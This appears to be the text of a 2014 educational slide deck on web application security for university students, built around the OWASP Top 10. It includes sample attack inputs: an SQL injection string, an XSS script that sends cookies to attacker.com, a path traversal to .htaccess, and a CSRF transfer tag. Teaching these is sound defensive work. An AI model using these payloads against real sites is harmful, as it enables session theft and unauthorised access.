15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.
2
Introduction
• Was: UH Student - Graduated 2012• Now: Full Stack Developer at Cyber-Duck• Things I do:
– Programmer: PHP, MySQL, Node.js (JavaScript), MongoDB, HTML/CSS etc.
– System Administrator: Linux server management– Security Tester: Reviewing and testing web apps
• Things I use:– TDD / BDD– Continuous Integration (Jenkins/Travis)– Vagrant + Docker
15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.
3
Knowledge Transfer Partnerships
“A relationship formed between a company and an academic institution ('Knowledge Base' partner), which facilitates the transfer of knowledge, technology and skills to which the company partner
currently has no access. Each partnership employs one or more recently qualified people (known as an Associate) to work in a
company on a project of strategic importance to the business, whilst also being supervised by the Knowledge Base Partner.
Projects vary in length between 12 and 36 months. The Associates are either postgraduate researchers, university graduates, or individuals qualified to at least NVQ (Level 4) or equivalent.”
WHEN YOU GRADUATE APPLY FOR THESE
15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.
4
This talk…
• A bit about Cyber-Duck• The development process• Server security• Application security• Testing
15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.
7
The process
• Research– Determine all security considerations for the project
• User Experience– Follow best practices
• Art Direction• Development
– Design production environment– Secure coding– Continuous testing
• Marketing• Support
– Bug reports– More testing
15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.
8
Server Security
• Type of server– Cloud, dedicated, shared, in-house
• Server stack– Operating system– Language / Technology– Database / Caching– Scaling options
• Protection– Anti-virus & Anti-malware– Firewalls & IPS– Back ups– Others…
15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.
9
Server Management
• Most servers have similar configurations• More clients = more traffic = more servers• Need a way to keep all of them up to date• We use Configuration Management software• Several available, Ansible, Chef, Puppet, etc.
15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.
10
We use Puppet
• Master server hold config for all servers• Agent servers read their config every half an hour• Patch once, everything updates• Able to use with Vagrant for development
15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.
11
Application Security
• Starts in the research phase of a project– Evaluate possible points of attack
• UX design application with secure methods• Security is most relevant during Development
– Be aware of vulnerabilities– Follow safe practices– Test for missed vulnerabilities
• Post-launch continue testing– Bugs may reveal vulnerabilities– Bug-fixes may create vulnerabilities
15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.
12
Staying aware of vulnerabilities
• Official lists and statistics – OWASP Top 10, CSA, etc.• Mailing lists• Industry news• Blogs• Social media – especially twitter• Common Vulnerability Scoring System (CVSS)
– https://web.nvd.nist.gov/ - 3,365 vulnerabilities in the last 3 months
15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.
13
OWASP Top 10
A1 InjectionA2 Broken Authentication and Session ManagementA3 Cross-Site Scripting (XSS)A4 Insecure Direct Object ReferencesA5 Security MisconfigurationA6 Sensitive Data ExposureA7 Missing Function Level Access ControlA8 Cross-Site Request Forgery (CSRF)A9 Using Components with Known VulnerabilitiesA10 Unvalidated Redirects and Forwards
15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.
14
Injection
• Most common is SQL injection• Applications are vulnerable when user input is not validated
Example:
<?php$prod = $_POST[‘prod_id’];$query = "SELECT * FROM users WHERE id LIKE '%$user%'";$result = mysql_query($query);
user_id = "' OR 1; #"
"SELECT * FROM users WHERE id LIKE '%' OR 1; #%'"
15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.
16
Broken Authentication and Session Management
• Misconfiguration of authentication and session management
• Attackers use this to compromise passwords, keys, session tokens or other valuable data
Example: Session Hijacking
http://example.com/loggedin?sess_id=a1b2c3d4e5f6
Victim emails this link, whoever receives the link is logged in to the victims account
15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.
17
Cross-Site Scripting (XSS)
• Occurs when un-validated user input is sent to the browser• Allows an attacker to execute scripts in the victims browser
Example: Comment forms
A comment is left:<script type=“text/javascript”> document.location = “http://attacker.com/post?cookie=“ + document.cookie;</script>
15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.
18
Insecure Direct Object References
• Internal implementations are revealed to the usere.g. file location or database key
• This is not properly protected allowing an attacker to manipulate the reference
Example:
http://example.com/user_uploads/my_image.pnghttp://example.com/user_uploads/../../.htaccess
15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.
19
Security Misconfiguration
• Several programs are required to run a single web application
• Any one of these can have a vulnerability if misconfigured• Secure settings should be defined, implemented, and
maintained, as defaults are often insecure.• Software should be kept up to date.
15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.
20
Sensitive Data Exposure
• Applications dealing with sensitive data must protect it• Suitable encryption or hashing must be used effectively• Data needs to be protected in transit and at rest
Example:
A website encrypts credit card data in the database using the built-in encryption mechanism. An injection vulnerability exists in the application allowing database data to be decrypted. If the application encrypted before storing the injection attack would only discover encrypted data.
15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.
21
Missing Function Level Access Control
• When a user logs in their access level is verified, this should also be verified on each subsequent request.
Example:A website has user and admin areas, an attacker logs in as a user and is redirected to:
http://example.com/user/dashboard
They then go to the following URL with full access:
http://example.com/admin
15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.
22
Cross-Site Request Forgery (CSRF)
• An attacker tricks a user into sending data from one website to another.
Example:A user is logged in to their bank account, which uses a session cookie. The user then visits an attackers website with the following code:
<img src=“http://bank.com/transfer?to=12345&amount=100” />
The cookie is sent so bank.com thinks the user made the request.
15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.
23
Using Components with Known Vulnerabilities• Modern web applications are built with libraries,
frameworks, plugins, etc. Vulnerabilities can exist in 3rd party code
• Not updating these libraries may introduce vulnerabilities• Dependency managers (composer, npm, etc.) can help with
this, but updates still need to be tested
15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.
24
Unvalidated Redirects and Forwards
• Sometimes it’s necessary to redirect a user from one application page to another. These redirects need to be validated to avoid misuse.
Example:
http://example.com/login?redirect=dashboard
Is changed by an attacker to
http://example.com/login?redirect=admin
15/04/2023 © Copyright 2014 - Cyber-Duck Ltd.
25
Questions?
Contact
Mark [email protected]
@MGarratt88http://www.cyber-duck.co.uk